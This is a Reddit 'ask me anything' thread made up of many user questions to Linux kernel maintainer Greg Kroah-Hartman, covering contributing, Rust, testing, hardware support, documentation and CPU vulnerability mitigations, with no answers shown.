What is the best way of ensuring patches being worked on don't pull a butterfly effect and break some strange hardware unbeknownst to the developer making the changes. When hobby maintainers will not have a vast array of hardware. ?

Especially seeing as the Linux kernel runs on everything from server farms to household appliances.
In light of the vulnerabilities discovered last year in Intel and AMD x86 code (like speculative execution, rowhammer, etc.), how have the Linux patches evolved since then to restore some of the former speed that was lost with the initial patching?
Love and appreciate the work you do! Thanks very much for maintaining the Linux kernel and making it so easy for us to use our hardware, weird or not!

My question was answered in your very descriptive description, so I'll ask you a quite simple one: Hope you and your family are safely quarantined from the pandemic and hope you've got the supplies you need at home :)
What do you perceive as the biggest problem/bottleneck/challenge for the kernel development currently and for the future?
Thank you for all your hard work on Linux. 

What are your thoughts on Rust. Do you think rust might be used in the Linux kernel in the future?
What are your thoughts on static analysis and formal verification of a kernel?

Do you think that complete formal verification of the Linux kernel is achievable?
Have you personally found any malicious patches submitted and were they interesting in how they tried to slip by?  Is the recent news about state actors targeting Linux for several years now made any changes to how patches are monitored?
I have around 100 patches accepted into the linux kernel tree. Every single one of them are code style (i.e. "as reported by checkpatch.pl") patches in the drivers/staging tree.

What would be the next step for me if I want to become someone that do patches in other places in the kernel, and not just a "newbie" kernel programmer that fixes code style issues. Do I just pick a tree that I find interesting, deep dive into it, subscribe to its mailing list and try to find work that needs to be done there, or do you have any other suggestions?
Hello!

I´m new to Linux, think I got Linux Mint about a month or two ago? So I´ve been slowly and steadily getting acclimated. However, I noticed that ASUS ROG gear doesn´t have a lot of support on Linux. At least, not the keyboard and mouse I have.

So my question is this: What manufacturer would you recommend for Linux usage? 

Sorry if it´s not related to the kernel, but I figured that as someone who types a lot, you´d know a good keyboard manufacturer.
How does kernel debugging work, do you instrument a VM or what?
What's your opinion on where OSs and computing is going on a long term scale? Modern OSs have only been around for 20-30 years and they are still not perfect. What will things look like 100+ years in the future? Are Linux and Windows just going to become giant bloated monstrosities or will something like BSD or Mac come out on top since they don't necessarily care about enterprise and support for older software. 

Or is everything going to change to web based where you have a thin client at home and all computation is done on a server?
Is it true that there's not really a bug-tracking system for the kernel ?  I know there is https://bugzilla.kernel.org/ but I hear it is not used much.  How do you get bug reports and what do you use for reporting and tracking etc ?
Hey Greg!
1, Any interest in pinephone or librem 5? 
2. Last I read you were just under 5 minutes for a kernel build, any improvements to that? Maybe a threadripper :)?
3. In the same vein do you follow Wendel over at level1techs?
https://level1techs.com/ I seem to recall that they donated a few builds to kernel developers but I could be recalling incorrectly 😅
Hey! I'm not sure if you're still doing this? Linux is one of the largest open source projects in existence. I'm wondering if you have any thoughts on """"The State Of Open Source""""?

Most specifically, some projects have decided to re-license to what appear to non-FOSS licenses (mongo and redis come to mind), I'm sort of wondering if this is on your radar and what you may think it means for FOSS going forward etc.?

Other question if you have time: It seems that WASM is touting itself as the new hotness for running programmings at the edge(?). (efforts are being made to allow many common languages to transpile/compile to wasm programs). I'm sort of at a loss as to why this is being done at all since good old linux for running programs is extremely powerful and useful. I'm wondering if you have any thoughts on the current positioning of WASM vs linux?
[deleted]
Thanks for the work you do!

I'm wondering what mistakes you think have been made with the design of the kernel in the past? If you could go back in time and talk some sense into Linux contributors from like 2000 or 2010 what would you tell them to do differently?
Thank you for doing this AMA and for your dedication and extensive work on Linux.

What are your thoughts on OpenBSD as a whole?  Is there anything that they're doing or have done that you would like to see Linux adopt (whether it's practical to do or not)?

What kind of side projects are you working on these days?  And which languages are your favorites to use?
Whats your all-time favourite computer games? If any :) Thanks!
At the last Linux Plumber's conference, [Dmitry Vyukov talked about existing kernel development processes and their problems.](https://www.youtube.com/watch?v=iAfrrNdl2f4)

What are your thoughts on this presentation and what changes, if any, do you think will be made in the next few years?
If you could be a kernel module, which one would you be, and why?
I'm a senior software programmer 35yo, use Linux since Mandrake Linux 8 and as main system since ubuntu warthy warthog, know nothing of the kernel. How can I start? do I go vertical on some module and research on it then start suggesting patches, ask on some devel forum for some feasible tasks and then improve from there.? How does it start?
Will reproducible kernel builds be a thing one day?
What are your opinions on immutable operating systems like Fedora Silverblue and app packaging formats like Flatpak?
How has the COVID-19 pandemic affected developers and contributors worldwide that contribute any amount of work towards the kernel? Have you seen a surge in the amount of patches contributed? And now that most contributors are stuck at home, did that in any correlative measure increase/decrease the quality of the patches contributed?
From what I've see the last time I looked at the kernel code, I didn't see any tests.

I highly doubt the kernel is not tested, so how is it tested?
How do you make money? Do big companies that use Linux pay you to work on it?
Would more people participate to Kernel development if the processes were moved to a modern Git-hosting platform like Gitlab or Github?

My little brother is studying Computer science and is getting into systems programming. The current resources available are already miles better than what was there when I was myself studying the topic but the git.kernel.org and the mailing-list approach were reportedly major turn-offs or hurdle to navigate for him and his classmates. Curious to hear your opinion on this!
Hi Greg, if you're still answering questions; Is there anything you particularly like about other system kernels that the Linux kernel is currently lacking?
Hello! I would like to know if being a kernel developer have to learn and understand every portion of the codebase or just some areas of them. How can i know if I am qualified and ready for the contribution?
I would really love to hear your thoughts on the OpenPower iniative and the influence of Linux on this.
Is the close coupling between GCC and the Linux Kernel a good thing or a bad one? AFAIK it still can't be reliably built with Clang or other compilers, though that might also have something to do with linkers...

Something that recently bugged me about the kernel by the way: I know that in edge cases it will be actually hard to expose this, but getting stats about the OOMkiller somewhere in sysfs or similar would be a really great thing to have. Currently there's no good way I know of other than parsing logs(!) to actually know that a program was killed. My question around this would be probably: How much interaction is there between people developing features for the kernel and people running it in production? How do kernel developers actually learn about pain points that are just "annoying" but not "well. my machine just deadlocked, time to roll back to an older version"?
Many of us are using ZFS on linux to deploy multi petabyte storage systems.

Is the resistance just because of the licensing issues or are there technical issues that would also get in the way of it's integration into the linux kernel?

Thank you for all your hard work!
Thank you for the all the work you put in to the kernel and for getting involved with the community. 

Why is your GVIM and that other window light mode, while everything else is dark mode?
No questions. Just a thanks for all the work and effort 👍🏾
Is it possible to understand how Linux , core of Linux works? Because, as I heard there are 3 million lines of code in Linux core
And which programming languages do you use more often(I know that you use C language in 90% of your coding time but what another languages do you often use too)?
If you could wave a magic wand and make one company upstream their kernel changes, which company would it be and why? Nvidia, Qualcomm, ...?
Could a hobbyist, without a computer science degree, ever contribute to the linux software development side? If yes, how he or she should begin, assuming they have rudimentary C language and Linux knowledge. Thanks
How do you feel about Windows' Subsystem for Linux?
hello Greg. thank you for kernel development. a year ago, I read lwn article about staging tree. what's current progress on moving in to mainline? i am primary interested in speakup module. thanks and keep up the grate work. ☺
Any chance for user space graphics drivers? That's one area where I feel like Linux is behind Windows. I really like that the driver can crash and be restarted in Windows. That means that some bad shader can't take down the system. That was very nice when I was first learning GLSL :-)
A lot of code changes have been needed to mitigate hardware vulnerabilities in x86 CPUs. If in a few years those vulnerabilities will be resolved on new chips, what will happen to all those mitigations in the future? Are they here to stay or will they be removed eventually?
I'm also running Arch and Gnome on a Dell XPS 13 9370, could you please tell me which thunderbolt hub you are using?


Additionally i'd be interested to know what bootloader you are using, and have you made any changes to make have a [silent boot](https://wiki.archlinux.org/index.php/Silent_boot) on your XPS 13?
> along with a new Logitech bluetooth trackball finally replacing my decades-old wired one.

Is it the Trackman Marble? Do you use any special configuration (e.g. rebinding buttons)?
Do you have another project that your regularly work on? (Other than Linux)
[deleted]
Hi Greg!

Thanks for your work at the Linux kernel. 

May I ask about your thoughts of the fact that Linux having so much fragmentation, or at least the fact that there are so many poorly-supported forks made by hardware facturers.

Recently I started to use more and more ARM boards, and most of them require a special BSP kernel to use all the features while the mainline kernel does not have a complete support of them. For example, I have a Jetson Nano and it's BSP kernel is still 4.9 with a rather low patch version. It is not even feasible to apply those patches by myself because there are so many conflicts. And for the mainline kernel, nouveau does not have a good support for it. I just want to say what Mr. Torvalds said years ago.

There are a lot more examples and...Will there be any solutions for that? Or at least for security patches (maybe like some universal patching mechanism)?

Also, may I call you for tech support if my server met problems, just as people from SUSE said in their Uptime Funk MV? (I just want to share [this](https://youtu.be/SYRlTISvjww?t=33) hilarious parody though)

Wish you have a good day.
What kinds of food have you been enjoying lately?  Has all this worldwide craziness changed your diet much?
Hi Greg. Thanks for your long time of work on Linux. I remember you were involved in KDBUS project of getting an messaging implementation into the kernel. Did that end completely or some of the work continued in BUS1 project?
Sorry if stupid question, my knowledge of how Linux works is basic, and I'll phrase this as permitted by my limited knowledge.

Wine keeps getting better and better but there are still some problems that are really hard to solve, as far as I understand partly because some apps try to access hardware relatively directly and having to go through Wine to Linux messes things up. Eg. lot of professional artists and designers would happily go Linux only if Photoshop worked properly (because Linux is stable, and Wacom kernel drivers are rock solid and work out of the box) - but a critical feature, tablet pressure is broken for a very long time and nobody could fix it. And sadly it doesn't look like Linux support is becoming the norm for games and especially professional software any time soon. :(

So I wonder, would it be possible to help Windows program compatibility through eliminating some of the extra hoops Wine is forced to jump through to make things work? Even if native support for Win apps is not possible without prefixes and such, do you think Windows programs could in the future integrate into Linux operating systems more seamlessly and easily?

Thanks for your answer in advance, and also thanks for your work on the kernel! :)
With everything moving to eBPF when will will be able to remove support for that pesky user space? ;)

Seriously though, what do you think will get the eBPF treatment next?
[deleted]
How long until RISC-V is in production and used in 5G, AI and IoT implementations?
Broad question: Where will free software be 10 years from now? With closed platforms, lazy cloud-addicted consumers and erosion of privacy, I am concerned. Just running a 'smart home' without giving up your privacy is a major challenge these days. Are you optimistic or pessimistic about the FOSS community?
Whys the kernel completely and utterly undocumented?

I tried to do something as simple and fundamental as a kernel module recently, eventually figuring it out based on third-party guides from 2.6, but it wasn't easy. Not even the format of the modules on disk is documented(Especially the damn signatures, how does signing work?! Let me sign them myself! Tell me where the signing info is so I can check it myself! The kernel depends on *openssl* for signing?!)

And on stuff to *do* in modules, even less is documented! Proc and Sys\* filesystems, not a single comment in sight! Did you know creating a procfs entry without any handler functions, instead of gracefully handling the null pointers, will irreparably freeze the system if you do `ls /proc`? But only some of them can't be null, you don't have to set all of them, of course *which* is, you guessed it, undocumented.

I didn't. Then I did.

----

\* speaking of sysfs, thats also almost completely undocumented in userspace too. Whats the point of it, when it's illegal to use?! What documentation of it that *does* exist, like the sysfs guide, says that anything not documented is unstable implementation details you can't use! And the few things that are documented are so minimal as to be useless!

----

I just wanted to see if the entry with the filename was created successfully, without first figuring out the also completely undocumented API to provide info(`seq_file`? found from stackoverflow? Not a single documentation in that header?!), and it crashed me.

How can any work get done like this? Gotta already be a kernel expert to do even simple things. The answer is the work doesn't get done, mostly. How many invisible lost contributions does this lack of simple documentation entail, people with the time and will to work to improve things if only linux told them *how*.

I just wanted to experiment on the kernel, contribute, but it's so impenetrable, impossible, for anyone who can't/won't set aside a few years to intimately and thoroughly study the code and pester the mailing list, to make it a career. Not something you can work on in your spare time, because the undocumented interface is also constantly changing, keep up or get fucked. Further evidenced by the fact that, as mentioned elsewhere in this thread, "The huge majority of the developers working on the software[(linux kernel)] are all paid for it."

This also isn't sustainable. Is the kernel expected to never have new contributors, or is every new contributor expected to spam the mailing list with hundreds basic questions about things that should be documented? It seems to be set up to stop the "plebeians" from attempting to contribute, and they must first ascend to "godhood", through tons of unnecessary hard work and devotion, to be able to.

TLDR: "Damn bruh you ~~live~~work like this?"
[deleted]
I don't have any kernel questions but I wanted to say I love that you still use VIM. All of my friends make fun of me for using VIM and say I need to get on the Nano bandwagon. :(
When you are stressed or tired, what do you do to relax?
[deleted]
Hi Greg, thanks for your work on the Kernel!

Is there any work going on regarding automatic option detection? I always find it is a pain to get all the correct options enabled for my new systems.

Side note: I recently wrote a tool to do this with LKDDb, and when writing it I noticed a lot of limitations. I know that several drivers detect devices by exchanging magic numbers over their buses and therefore cannot be included in a LKDDb like database.

So the kernel obviously has the code, but it often isn't compiled in when you do not select the correct option beforehand. Obviously that's a great thing to keep the attack surface small and compile times fast, but I thought it would be great to build an intermediate kernel just to detect device drivers with just controller drivers and detection functions but without building a whole driver.

Have there been previous discussions around this topic, and if there were, what were the results?
A few months back you made [this comment:](https://www.reddit.com/r/linux/comments/dyv2qi/google_outlines_plans_for_mainline_linux_kernel/f84objd/)

>Wow, the crazy^Wmisunderstandings in this thread is way worse than normal for r/linux.

Is there anything you'd like to see out of the mod team to make this subreddit better?

I'd also be interested in hearing your opinion about secondary sources re-hosting mailing list information, a lot of the time I think rumors spread because of these sources which we strive to ensure the primary source is linked here.
What do you think of the changes Clear Linux has done to the kernel?


Also, I'm getting this error on this laptop both on Fedora and Ubuntu LTS:
    
    AER: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
    [ 4818.971128] pcieport 0000:00:1c.4: 
    AER:   device [8086:9d14] error status/mask=00000001/00002000
    [ 4818.971130] pcieport 0000:00:1c.4: 
    AER:    [ 0] RxErr 


Is that a kernel issue or a hardware one? Thank you for doing this AMA and everything you do for Linux.
Why is Linux better than Win and which code I need to know to operate in Linux?
The Linux Foundation does excellent kernel training but this isn't accessible to people without a training budget.

What are some resources you would recommend for people looking to get started with Linux kernel development?  Websites?  Books?

Is the Linux Device Drivers book still of any use given the advances over the year?

Also, are there any kernel coding challenges or CTFs that you know of?

Thank you very much!
Our kernel is good because this guy use vim so much and Arch.

Peace.
Why doesn't Linux have a user space library like other systems? Even the manual pages treat glibc as if it was _the_ kernel interface when it's actually a separate project.

There's an awesome [`nolibc.h` file][nolibc.h] in the tree which allows direct access to Linux system calls on many platforms. It could be the foundation for a lot of software.

[nolibc.h]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/include/nolibc/nolibc.h
For someone who wants to learn the kernel development so they can contribute which resources and path you recommend? I like to contribute mainly on core kernel code functionality to improve my skills in OS development. I also like to help on driver part.
IF Linux Desktop gets popular (with the masses that is) are you worried at all of what it will turn into? Are there any parallels to draw from the security problems, and the commercialization focus on android and Windows? Are fears of a dystopian Linux desktop justified at all or there will always be a free software shelter for us Users?:)
A while back you said you were [signing your own kernels](http://www.kroah.com/log/blog/2013/09/02/booting-a-self-signed-linux-kernel/). Are you still doing that? Do you have any update or advice?
I am working as a freelance.I would love to be payed to contribute to the kernel. How can I find people willing to add features or improvements to the kernel?

I did a few contributions but nothing really regular unfortunately.
I would love to hear your thoughts about whether and when Wayland will will replace xOrg? Also, is fragmentation hurting developers and adoption, and is the Linux Foundation doing something about it?
Advice for an aspiring kernel developer? Intermediate at best in C.
[deleted]
I posted this in the "coming next week" thread, but to repeat here,

I know that when Linus took time away  from kernel maintenance, you were designated as the guy to keep things  running. Is there an explicit plan in place for the case of an  unforeseeable absence / retirement of our glorious leader?

Thanks Greg.
I'd just like to stop in say I'm enjoying more reading others questions and seeing your answers. That said if I have to ask a question, what sounds good for dinner tonight?
What are your thoughts on debated topics in the community, like IO operations causing extreme slowdowns in graphical sessions, a stable in-kernel ABI for modules or the behavior of the oom killer?
I'm a web developer a/k/a master of writing glue code between libraries, blackbelt in searching stackoverflow and not much else. Just wanted to say, really appreciate the time you're taking to pop in and answer questions about the Linux Kernel! Even if I don't understand what 90% of this is.
How do you feel about Rust? I like it as a language, but I am debating forsaking it in favor of C so I can contribute to my favorite software. Do you think there’s a place for Rust the future of kernel/kernel module development?
I hope this isn't too late but I just wanted to say thank you. I'm just an end user now in the first week or so of trying out different Linux distros and I just wanted to let you know that this has been an absolute joy. Thank you.
Hey Greg, I have bookmarked this thread between you and Ted about newbies.  https://lkml.org/lkml/2015/9/18/94  I really appreciate the points you make, and it always makes me happy and really proud to reread that thread once in a while.  Thanks for sticking up for the n00bs.

I think there's a lot of great resources for getting started, but I was wondering if you had tips for folks looking to get hired and paid to work on the Linux kernel (or other FOSS software they use and love)?  Helping volunteers and contributors sustain contributions is something that interests me.
woow! it is really cool having "someone from the inside" interacting with us! No questions from me... hope you and your family are safe and well. :)
Do you think Google eventually switching their mobile OS to Fuchsia/Zircon will affect Linux? How important is Android right now for Linux?
Hey Greg, I firstly want to say I am tremendously thankful for you and other maintainers' incredible work managing the largest software project ever. Keep up the good work!

As for my first question, I would like to know what your opinion is on Wayland. Do you use it with your Gnome? Do you expect it to universally supercede X11 implementations in the future? What is your opinion on the technological changes behind it? 

My second question concerns drivers. Sadly, I have an Nvidia GPU in my main workstation and so this is a sore spot. Do you see Nvidia ever releasing an OSS official driver? Do you stand behind Linus' infamous middle finger to them?

My third question regards your workflow. I think I have read that you once used i3. What made you switch back? What are your two cents on the growing Arch-I3-gaps-polybar- r/unixporn - etc crowd? As I have started using Linux in this manner because it sounded cool, then started frantically distro hopping before settling into Gnome-Arch on the workstation and Xfce-Debian on a lesser used lower powered laptop, I don't think jumping straight in to TWMs helps new users.

My fourth and mostly sarcastic question is, have you tried Emacs? I do use vim for work lately, but I think Emacs still is great and offers a different perspective to consider on what the balance should be between OS facilities and an editor in a workflow. 

My last question is more philosophical; do you think "The year of the Linux desktop" will ever come? Is it a goal of the kernel maintainers or a job reserved to entities like Canonical, Red Hat and the Gnome Foundation? Is ChromeOS' Crostini of any help?

I am seriously thankful for the AMA and the opportunity to ask questions for such a prominent figure in the world of Linux. Excuse me for the long post...
I am probably too late to ask now but I need to know. I see [you are making commits to android-mainline kernel branch](https://github.com/aosp-mirror/kernel_common/tree/android-mainline). What work are you doing with android kernel?
Hi Greg,

I am a frequent reader of LKML. I see and read every post you send there. It's an amazing space.

My question, perhaps stupid as all get out is: Why doesnt the development cycle take a "pause" and spend a cycle, maybe two, and focus on bug fixing and code optimization only?

I see additions and new code each and everytime a new version pops out. And in the same time frame bug fixing older kernel and driver sources. Why not take a pause form adding new code, so that the older, current code, gets 100% sorted out first?
Possibly a silly question, but what makes a distro a distro?

Can I take a Debian based distro, uninstall everything that makes it unique and just have standard Debian? Can I then install a particular DE and package manager and replicate a different distro?

I ask because I've been playing with NixOS. It's a declarative system where the entire system state (shell, networking, drivers, package manager, applications) is defined in a single config file.

The crux of my question is of one could define "Ubuntu" in this config file, and then build the system - what would be the difference between this and "real" ubuntu?
[deleted]
Greg, I just wanna say how much I appreciate all you and the other devs do. Open Source is a life-changer for me.  

Anyway, I just upgraded to Ryzen 3000 this week (from 2nd Gen), and I already have a PCIE Gen4 GPU and NVME SSD, and was planning on moving from B450 to X570. Any word on the IT87/CPU monitoring issues with X570 boards that use those SuperIO chips? Or should I try and make sure to get a board that uses the nct6775 driver?
Hi! 

Thank you for keeping this thread alive.

I moved to Linux just recently and my main concern was that it's mostly community driven.

I use popular Ubuntu 19.10 and with Windows or MacOS I had that sense of "continuous" support. With Linux I have a longevity concern. 

Do you think we will see problems 10-15 years with people contributing to linux and project dying or we will see a spike in Linux users/developers because of privacy concerns?
Is there any new/developing hardware or sector that you're excited to see use the kernal? (For example the initial proliferation of smartphones using Linux components would (to me have been exciting).
What's up with security trumping usability lately? The spectre mitigations can at least be turned off but RC6 was broken for months on several intel iGPUs that are mainly used in notebooks.

These vulnerabilities are not something that is generally exploited on a desktop system but rather a multi user server and the patches killed battery/performance.

Another example: https://www.phoronix.com/scan.php?page=article&item=intel-gen7-hit&num=1

This has left me compiling modules and missing real security vulnerabilities that apply to me because I can't upgrade without doing the whole song and dance again. What's the solution here because I don't think anyone is backing out a CVE and linux does indeed have desktop users.
[deleted]
[deleted]
How can I contribute to Linux without any programming?
How do you type with boxing gloves on?
[deleted]
Sorry if this is a stupid question. But how do  you start contributing to the kernel? And where is the project held, I've been using Linux for about 5 months now and I absolutely love it, I'd rather use it than any other OS. I'm also a big believer in FOSS, so I really want to contribute in any way I can, I am also an aspiring programmer, so working on a code base is interesting to me.

&#x200B;

Once again sorry if this is a stupid question.

EDIT: also I looked into Mutt, do you use the popular fork NeoMutt or just Mutt?
What are your thoughts on Lisp, Haskell and OCaml?
Hello,

Thanks for the work you do on the linux kernel.
My question is simple (unrolled acronyms for readers): do you think WSL (Windows Subsystem for Linux) poses a threat to linux in the form of microsoft's popular EEE (embrace, extend, extinguish) pattern?

Cheers

P.S do you think there should be a quota on air-travel e.g max X flights abroad per year?
Is it true that the PREEMPT\_RT patches are going to mainlined soon?
Not sure if this is a kernal thing, but how come audio that not over USB is so inconsistent between computers running Linux? I have my desktop which is fine, but I can never get a headphone jack to work on a laptop.
[deleted]
I just finished writing my first Linux driver for work. A character device for a custom FPGA we're using. It was a lot of fun. By the way, thanks for answering a handful of questions over the last few months on #kernelnewbies.

Do you have any suggestions on how to find new hardware/data sheets to write drivers for? I think I've learned enough to contribute, but everywhere I look, everything already has drivers.
[deleted]
In your last AMA you wrote that you were "[working on a new hardware 'bus' for a new type of device, allowing [you] to help define the application protocol being used to talk on the bus.](https://www.reddit.com/r/linux/comments/2ny1lz/im_greg_kroahhartman_linux_kernel_developer_ama/cmi7lrs/?context=9)"

Did that come to fruition? Can you tell us any more about it? What were the most frustrating and the most satisfying aspects of that project?
Can we realistically expect to ever have proper power management for modern dual GPU laptops ?
What is the appropriate or right way to safely remove external hard drive with USB 3.0 cables in Linux?

I have several external hard drives with the purpose of the essential data backup. As is acknowledged, there are some trivial problems here. The moment I right-click drive icon in the file manager panel to choose safely remove the external hard drive, the hard drive will automatically remount again after several seconds. Only one works normally, which is the same as Windows.

Currently, I choose to unmount the external hard drive in the terminal, unplug the power supply concerning the external hard drive and eject USB 3.0 cable from PC. Is it a proper way to remove external hard drive safely in Linux compared with Windows platform?
[deleted]
1. As a low-level developer, what do you think about RISC-V? Is this a good architecture compared to ARM/x86, which took into account the past mistakes? 

2. Do you believe in Rust as a language for writing drivers? Is the initiative developing? Or is Rust a better place in system programming? Microsoft also became interested in Rust (and in its principles) as a language for writing system components. 

3. What do you think about Fuchsia OS? If vendors adopt this OS instead of Android, will this affect the popularity of the Linux kernel?
Thank you for your work. My question: Is there any thing in kernel that you would completely change? Do you think something should be written different than it currently is?
Why is USB3 so unstable? We are using Intel HW (NUC + Realsense camera) and I would say the MTBF is a couple of weeks. Which is a lot of failures, if you have dozens of devices running

Intel's forums a full of similar complaints so we are not alone.

The device falls back to USB2, it doesn't enumerate on boot, whatever...

Sometimes reboot helps, sometimes you even need to power cycle the device (luckily there is rtcwake).

Of course it could just be bad HW, but as you wrote elsewhere it is the kernel's task to work around buggy HW.

Do you have any pointers how to debug USB issues? Can the USB subsystem be re-initialized without rebooting?
I was thinking about how it must be to be able to contribute to Linux.  Probably, usually it is a bug fix or some optimization. But what about  the roadmap of the project, all the features it is gonna support and the  path of progress it takes? Who actually decides this and how can a  usual developer influence these decisions?
Will there be many things to do regarding Linux kernel after 10 years?
I have never been able to get ionice to noticeably change IO behaviour of processes, is it still implemented?

I set a process doing large sequential reads to idle and started another process at normal priority but the supposedly idle process was still happily clawing away a huge amount of speed from the other one as if there was no IO prioritisation despite the ionice manpage claiming that "The impact of idle io processes on normal system activity should be zero.".

Speaking of processes affecting each other's IO, do you know if it's possible to make processes running in parallel go at (or close to) the speed of running them sequentially?  
For example if I read two large files front to back sequentially the speed is 1x which is pretty close to the speed of reading off the block device they're on directly. If I read the files in parallel however, each one reads at <0.3x.   
I tried switching IO schedulers and playing with their parameters while the IO was running but nothing had a noticeable effect.  
The same happens when copying a file on the same disk.
I am new to linux, just started using Manjaro KDE.

Is there a linux alternative to Miracast? If not, is there any plan for future?

Thank You
Hey, thanks for all your kernel work! I have a Q.

Do most kernel devs develop the linux kernel full time? Or is it a side thing like most other FOSS projects?
Hi Greg, thanks for your time, my question is :

Who is your favorite programmer ?

hard mode: it must be someone that is not working on the Linux kernel.
Hi, thanks for the free stuff and the incredible platform. I'm not sure whether you are the right person to ask (I'm just an enduser), but I'm very curious.

The most magical part of linux for me in recent years have been the device drivers being packaged into it. However, I don't understand why touchpad usage experience is subpar (comparing to macs obviously). Is it impossible to make it good on myriad different devices? Or is it a hard design problem or has some other challenges that will get solved maybe in few years?
I'm here to say hello. I've just become a junior sysadmin and I use Fedora daily these days now. I hope I can have a couple questions :P

What do you think about major userland changes that've come to Linux in the last ten years, systemd and Flatpak in particular? I personally like flatpak, because it simplifies installing of some weird random applications and after becoming a sysadmin I've started to appreciate systemd for its simpler management, but I still think its architecture is a bit flawed.

What'd you advise to someone that wants to start in OSDev sometime in the future, maybe I'd like to commit to kernel, maybe userland or some distro. Where do you think it's best to start?

How did you start your career with FOSS in the very beggining?

What do you think about *BSD and other FOSS Operating Systems/Kernels?

What do you think about the recent development of GNU/Linux on smartphones?

Thanks for an answer in advance. Cheers and have a great day! :3
What valuable development utilities do you think are underrated or deserve to be more well-known? (e.g profiling tools)
I am playing with a microcontroller hobby project and I am trying to imitate Unix by using newlib with freertos. It seems to work and I am trying to learn by comparing what Linux does but it takes me a lot of weeks just to make some progress. Are there any resources on this topic (kernel or not ) to make me walk a little faster?

Also I like Linux because I love freedom. Thanks for letting that go on.
Just wanted to say I watched your video recently from the Linux Foundation on your Developer Workspace! Thanks for all the hard work you put in!
[deleted]
Do you have an opinion of bcachefs? Do you see major roadblocks for its integration in the linux kernel?

Thank you for this AMA :)
What are your opinions on adding new and removing architectures to the kernel? Do you sometimes think that there are too many?
I've seen a lot of focus on servers from kernel devs but less on mobile. I'm sure you are aware of the inevitable gravity of mobile devices and use them yourself. Is there much thought given to that in the team? In this case I'm thinking specifically of how the kernel behaves in low memory conditions, as you might often see on a phone.

As other have said, thank you for the work you do. I'd love to make my own small contribution but find it all a bit scary and impenetrable.
0. Thank you for our work. 
1. What are your thoughts on Google Fuchsia?
2. What are the current state of Nvidia drivers? Are they playing nicely?
Hi, what should one do when you don't get a response to a patch submission? I submitted my first trivial kernel patch [here](https://patchwork.kernel.org/patch/11445871/) to linux-input but haven't received any response.
How to get heard in the LKML?
Why are the linux people so opposed to non-breaking (or versioned) kernel ABIs.

It's a great inconvenience that one can't use newer modules with the older kernels and vice versa. I can't write a driver for my custom PCI card and be sure that it will work until needed ABIs are supported.
Any thoughts on Pipewire? Is it the solution to all our audio problems? Is it even on the radar of kernel developers?
A few friends of mine and I have been wondering for a while, and this might be a weird one: do you still (?) live around The Hague?
What is your opinion about the rule "we should not break the user space"?
I've read something recently about ifconfig and kernel developer actively maintaining bug and not fixing them because we shouldn't break user space. Shouldn't we break user space in a special release to get rid of those bugs?

Edit:
Found the article
https://blog.farhan.codes/2018/06/25/linux-maintains-bugs-the-real-reason-ifconfig-on-linux-is-deprecated/
Hey! Thank you for your amazing work with Linux!

What is your current smartphone? 

Rooted?

 Kernel version?
Why is there no mechanism to prevent any process from using 100% of cpu power? It would prevent freezing by processes and on some occasions opening terminal and using ps wont even work because even the keyboard is unresponsive.
Did that guy from the thread 5 years ago get his dongle driver merged?
Why is it that when I remove the 'audit' package it causes a kernel panic?
What does your development / test environment look like? Do you build and run in qemu or do you use namespaces or something else?
Do you do any smoke testing before submitting a patch?

Also do you think there would be any hope to use anything other then makefiles/kbuild, has there ever been talk of retooling changing to cmake or Mesos?
Has your life changed due to COVID-19? How many rolls of toilet paper do you have left?
I've been a Linux professional (sysadmin) for over 5 years now. In the workplace, I see it only rarely, but when I go into community endeavors I am shocked back into remembering how much gate keeping is in the community, and the resultant imposter syndrome.

Do you find that you experience this, or is this something that one grows out of with more experience under their belt?
Have you ever felt like you should completely abandon C and just switch to C++ or something easier to write?
I'm sure you deal with this question on a daily basis, but how do you feel about issues like this were an auto-update breaks the way certain functions in apps work or don't work. Do you feel it is the problem of the app developer or an issue in the way the Kernel was updated?[https://www.reddit.com/r/IntelliJIDEA/comments/fxaoo2/ubuntu\_auto\_update\_to\_20201\_broke\_syntax\_parser/?utm\_source=share&utm\_medium=web2x](https://www.reddit.com/r/IntelliJIDEA/comments/fxaoo2/ubuntu_auto_update_to_20201_broke_syntax_parser/?utm_source=share&utm_medium=web2x)
Hey thanks for all your hard work!

I am curious about a couple things related to disk I/O.
1) when applications coredump, I usually have ulimit -c unlimited.  But as my apps are mlocked to 4GB, when they dump they take minutes! to generate the core file. This creates bottlenecks throughout the system as the OS is busy generating/writing the core file and other things get impacted (like sending heartbeats over the network).
1.1) can't the OS do async IO in this case? I don't fully understand why everything pauses until the core is generated
1.2) if I set my ulimit to a small size (let's say 1MB) -> how do I know what size is "safe" so that I can still debug core files without being the vast areas of locked memory that I don't really need (hopefully) for debugging?

Unrelated bonus questions:
a) I was reading through sched_clock() code, and I don't understand the multiply and shift values that it computes. I thought the clocksource is RDTSC, but it must not be as when I feed a RDTSC computed Delta to it I get wrong nanosecond vakues.  So what is the clocksource, and can it be accessed in user space?

b) if I wanted to understand everything that happens from the time my client application does an action all the way to the server application (for example, sending a TCP packet), I figure that with strafe, tcpdump, maybe system tap? I can figure out all the steps that are happening throughout the kernel, and the performance cost? Or is there a better way to be able to analyze code for performance?

Thanks again for taking the time to answer these questions!
Hi Greg, Bit of controversial question, What is your opinion on COC? Specially with recent incident of using it for denying access to Linux conference to a person who has opposing views (tweets) than the Linux Foundation[1]. 

BTW, I'm a huge fan of yours. Thank you very much for your hard work on the Kernel. Wish you the best.

1 - https://www.patreon.com/posts/linux-foundation-31469894
Hi, thanks for the awesome work on the Linux kernel. 

Are you at all concerned about the [bus factor](https://en.m.wikipedia.org/wiki/Bus_factor) of the project ? In other words, do you think the kernel development could be in any danger if you, Linus, or some other key people would stop working on it for any reason ?
Any plans on writing or co-authoring an updated linux device drivers book? The one that we have is outdated even though the basics are good.
Hello Greg,
Thank you for your work!
I'm working on embedded systems and on every project that I worked professionally I'm used to seeing integer values defined as uint8_t, uint32_t and so on.
But I have seen that the kernel developers use int.
Since int size changes depending on the CPU architecture, what is the technical reason it is used?
Hi Greg,

Thanks for AMA and for all your Linux kernel work! 

How do deal with unresponsive maintainers? We've seen cases where emails fell through the cracks and even resending them doesn't help.

I now that free pings aren't helping but what should we do?
[deleted]
&#x200B;

I do this often when shopping for a  new product I really want: if Linux support isn't listed and research  says it doesn't work I'll send an email and usually I get good responses  back! It's a great way to show demand is there, and gives you better insight into which companies you want to support with your money.

